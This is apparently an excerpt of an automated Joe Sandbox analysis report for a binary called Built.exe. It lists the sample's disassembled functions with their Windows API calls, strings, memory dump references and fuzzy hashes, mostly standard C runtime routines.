                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                      • Instruction ID: c537f151fe50e26751e0ceb0704c424d7e94f75f6d8fd4fdb3a1ec125b076e33
                                                                      • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                      • Instruction Fuzzy Hash: 6011BF32E7CA13C2F6583528D45637989406FEC364FD50634ED7E06ED7AE2DA8409132
                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA6BF
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA6DE
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA706
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA717
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA728
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                                      • Instruction ID: e3a23c33b4fa1eb9fd91c5ef346cb7a13ea3ab6ee5d1027c0814d02c4e948de1
                                                                      • Opcode Fuzzy Hash: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                                      • Instruction Fuzzy Hash: A5113020E2C642C1FA547325556197AE1515FA83E0FC84334EC7E46EDBFE2CB4418B39
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                                      • Instruction ID: 88cfe3cb0151cc5226be51c48b3f9b27207ac513443e6026b74b00aedbaccd97
                                                                      • Opcode Fuzzy Hash: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                                      • Instruction Fuzzy Hash: 0F11E820A2D207C2FE68B22654719BAE2814F69370FD84734DD3E4AED7FD2CB4414A39
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: verbose
                                                                      • API String ID: 3215553584-579935070
                                                                      • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                      • Instruction ID: 58d4a0c45c034535798c90c5705db5d4201cef23c357bde8c4b553dc42533d2b
                                                                      • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                      • Instruction Fuzzy Hash: B491E032A2CA46C1F721AE25D46037DB291EB02B95FC84136DE6D46BD6FE3CE4058339
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                      • API String ID: 3215553584-1196891531
                                                                      • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                      • Instruction ID: 00f3fb61398ae157db352b101cb9edf821928cd36e35494b1debe1730105adbc
                                                                      • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                      • Instruction Fuzzy Hash: 5881C732E2D283C5F764BF25C130278B6A0AB11749FD58035CE6A97A87FB2DE4419739
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 2395640692-1018135373
                                                                      • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                      • Instruction ID: 077da19fe4a2d0217033103bb0f44f8a20e6de25ef0e4e5635f16acedf8bcbba
                                                                      • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                      • Instruction Fuzzy Hash: 5D51C432B2D642CADB14EB15E804678B791EB54B88F948139DE4D47B86FF7CE851CB20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                      • Instruction ID: e5620f61929949cceb766e7b98cc03726e2ecfd5afd69685a473950756f74a51
                                                                      • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                      • Instruction Fuzzy Hash: E8519132A2C282C6EB74AA119045268B6D0EB54B84F94513ADE5D83FD6EF7CE491CF31
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                      • Instruction ID: b46da84da2d0290710e07bead2f149b0ac091433b39eabe9268ce78014536982
                                                                      • Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                      • Instruction Fuzzy Hash: A1615D3291CB85C1D621AB15E4417AAF7A0FB85B94F444239EF9D43B96EF7CE190CB20
                                                                      APIs
                                                                      • CreateDirectoryW.KERNEL32(00000000,?,00007FF76D5C324C,?,?,00007FF76D5C3964), ref: 00007FF76D5C7642
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory
                                                                      • String ID: %.*s$%s%c$\
                                                                      • API String ID: 4241100979-1685191245
                                                                      • Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                      • Instruction ID: 34878bade6f2a169e299abda865b778c46e2aea461ab8f349b0c133f793c5391
                                                                      • Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                      • Instruction Fuzzy Hash: 1D31BA21B2DAC5C5EA21A715E4107E6A254EB94BE4F844235EE6D43FC6FF3CD2458B20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message$ByteCharMultiWide
                                                                      • String ID: Error$Error/warning (ANSI fallback)
                                                                      • API String ID: 1878133881-653037927
                                                                      • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                      • Instruction ID: 58c539b24cf601d68934e0dd18d3760c98d0f56d8f1a08c7835b8e1f7310e481
                                                                      • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                      • Instruction Fuzzy Hash: 63115E6263CB86C1EB20AB10E451BA9B364FB48785FD05139DE9D17A56EF3CD605CB20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message$ByteCharMultiWide
                                                                      • String ID: Error/warning (ANSI fallback)$Warning
                                                                      • API String ID: 1878133881-2698358428
                                                                      • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                      • Instruction ID: a1e3e820adbdf5d9d0056f378c3c9860ad9a4cc396f98fe983883545f52af3f1
                                                                      • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                      • Instruction Fuzzy Hash: 00118E6263CB86C1EB20AB00E451BA9B364FB48784FD01139DE9C57A46EF3CD604CB20
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                      • Instruction ID: 51eb6e5c2796886c7b9392c636550f425dff08be3fa3c59efa90b4c89deca0fa
                                                                      • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                      • Instruction Fuzzy Hash: C7D10672B2CA81C9E710EF65D4502AC77B2FB44798B944235CE6E57F9AEE38D006C324
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _get_daylight$_isindst
                                                                      • String ID:
                                                                      • API String ID: 4170891091-0
                                                                      • Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                      • Instruction ID: b4c6ad06c65de72ce3e7a4578f2eede24eb7067651335016378858b5ef976543
                                                                      • Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                      • Instruction Fuzzy Hash: F5511972F18111CAEB18FF64D9A16BCE7A1EB44359F900235DD2D96EE6EF38A4018720
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                      • String ID:
                                                                      • API String ID: 2780335769-0
                                                                      • Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                      • Instruction ID: f51ffc6533edf02ab3b870bd225a4aa94235db5e943870c46a2de1ff293c5982
                                                                      • Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                      • Instruction Fuzzy Hash: 0B519022A28641CAFB10EF71D4613BDA3A1EB5CB98F508135DE1957A9AEF38D4818734
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 1956198572-0
                                                                      • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                      • Instruction ID: 80d1beb9ce618d1b8a3ef159b9948ece14119529072c8ea31644ced54649c984
                                                                      • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                      • Instruction Fuzzy Hash: DB118A21A2C242C1FB65BB5AE545379A252EF88B81FC49135DE4906F9BDD3DD4818930
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                      • String ID: ?
                                                                      • API String ID: 1286766494-1684325040
                                                                      • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                      • Instruction ID: 5b24d7d7d8e1809f1cd3ac0a373fdfb3f1329f035c4cc1df6e93142e161c2ac6
                                                                      • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                      • Instruction Fuzzy Hash: 4E41D822A2C682C6FB64BB25941177AD750EF8DBA4F944235EE6C06ED6FF3CD4818710
                                                                      APIs
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D835E
                                                                        • Part of subcall function 00007FF76D5D9C58: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C6E
                                                                        • Part of subcall function 00007FF76D5D9C58: GetLastError.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C78
                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF76D5CBEC5), ref: 00007FF76D5D837C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\Built.exe
                                                                      • API String ID: 2553983749-3074098987
                                                                      • Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                      • Instruction ID: 4264282602f076345a22c95d98c3d56f1b3de88ff10150415223d461c1dbb03d
                                                                      • Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                      • Instruction Fuzzy Hash: B7419E32A2CA52C5E724FF2598611BCA794EB487C4B855035EE2D03B86EE3CE480C334
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                      • String ID: .$:
                                                                      • API String ID: 2020911589-4202072812
                                                                      • Opcode ID: 02917ae70002487e25aaa57807b70e18839398bc457e7bd9011200fb9d4eab61
                                                                      • Instruction ID: c19752f57cbe9ee79995c92747ce3ed21da583478f41830398c3fbd6db95ee55
                                                                      • Opcode Fuzzy Hash: 02917ae70002487e25aaa57807b70e18839398bc457e7bd9011200fb9d4eab61
                                                                      • Instruction Fuzzy Hash: 97414F22F2C792D8FB10AFB198611BC66B4AF14758F940035DE6D67E4AFF3894428338
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
